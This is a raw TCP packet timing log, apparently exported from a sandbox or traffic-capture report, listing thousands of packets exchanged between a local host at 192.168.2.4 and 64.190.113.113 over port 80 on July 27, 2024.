                                                                              Jul 27, 2024 14:53:02.904254913 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904269934 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904283047 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904298067 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904316902 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.904333115 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.904510975 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904536009 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904548883 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904562950 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904577017 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904589891 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904597998 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.904604912 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.904633999 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.955926895 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.984709978 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.984831095 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.984864950 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.984896898 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.984930038 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.984961033 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985013008 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985044003 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985075951 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985100985 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985100985 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985105991 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985138893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985169888 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985208035 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985239029 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985270977 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985301018 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985332966 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985356092 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985356092 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985356092 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985364914 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985399008 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985399961 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985399961 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985399961 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985443115 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985465050 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985496998 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985517979 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985531092 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985563040 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985579967 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985594988 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985626936 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985642910 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985658884 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985690117 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985709906 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985730886 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985778093 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985897064 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985929012 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985960007 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.985976934 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.985991955 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986023903 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986043930 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986056089 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986088991 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986103058 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986120939 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986151934 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986176968 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986185074 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986217976 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986233950 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986249924 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986282110 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986299992 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986314058 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986346006 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986363888 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986377954 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986409903 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986428976 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986797094 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986829996 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986860991 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986860991 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986893892 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986911058 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.986923933 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986955881 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.986988068 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987004995 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987019062 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987051010 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987051010 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987085104 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987109900 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987117052 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987150908 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987166882 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987440109 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987473965 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987497091 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987505913 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987538099 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987557888 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987570047 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987603903 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987620115 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987636089 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987667084 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987694025 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987699032 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987730980 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987747908 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987763882 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987796068 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987813950 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987828016 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987859964 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987874985 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987891912 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987924099 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987940073 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.987956047 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.987988949 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988003969 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.988651991 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988703012 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988713026 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.988739014 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988773108 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988790035 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.988806009 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988840103 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988857985 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.988873005 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988905907 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988923073 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.988940001 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988971949 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.988996983 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989006042 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989038944 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989058018 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989072084 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989104986 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989124060 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989136934 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989168882 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989187002 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989202976 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989250898 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989331961 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989363909 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989407063 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989418030 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989440918 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989473104 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989504099 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989504099 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989536047 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989553928 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989568949 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989599943 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989617109 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989631891 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989664078 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989686966 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989696026 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989727020 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989747047 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989758015 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989789963 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989809990 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:02.989821911 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989856958 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:02.989881039 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.034281969 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073004961 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073045969 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073090076 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073122025 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073153019 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073185921 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073218107 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073249102 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073282003 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073312044 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073343992 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073393106 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073424101 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073455095 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073472977 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073472977 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073487997 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073520899 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073551893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073585987 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.073720932 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073720932 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073720932 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073720932 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.073720932 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074274063 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074335098 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074368000 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074395895 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074400902 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074434996 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074455976 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074467897 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074501038 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074518919 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074534893 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074568987 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074599981 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074600935 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074635029 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074652910 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074666977 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074698925 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074723959 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074732065 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074765921 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074786901 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074798107 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074836016 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074851990 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074867964 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074914932 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.074932098 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074963093 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.074995041 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075014114 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075023890 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075057030 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075074911 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075089931 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075139046 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075139046 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075174093 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075205088 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075227976 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075237036 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075269938 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075293064 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075301886 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075334072 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075360060 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075366020 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075397968 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075421095 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075429916 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075462103 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075491905 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075499058 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075532913 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075548887 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075565100 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075597048 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075613976 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075628042 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075659990 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075676918 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075690985 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075722933 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075741053 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.075754881 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.075807095 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076083899 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076117039 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076148987 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076169014 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076183081 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076222897 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076241970 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076255083 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076286077 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076308012 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076317072 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076349974 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076368093 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076380968 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076412916 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076430082 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076447010 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076478004 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076498032 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076536894 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076570034 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076591015 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076601982 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076633930 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076657057 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.076668024 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.076719999 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077119112 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077157021 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077189922 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077208996 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077224016 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077253103 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077280045 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077285051 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077318907 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077334881 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077351093 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077383995 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077404976 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077416897 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077450037 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077467918 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077481985 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077514887 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077537060 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077547073 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077580929 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077601910 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077610970 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077645063 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077678919 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077686071 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.077713013 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.077734947 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.078006983 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.078039885 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.078066111 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.078072071 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.078104973 CEST804975164.190.113.113192.168.2.4
                                                                              Jul 27, 2024 14:53:03.078121901 CEST4975180192.168.2.464.190.113.113
                                                                              Jul 27, 2024 14:53:03.078135967 CEST804975164.190.113.113192.168.2.4
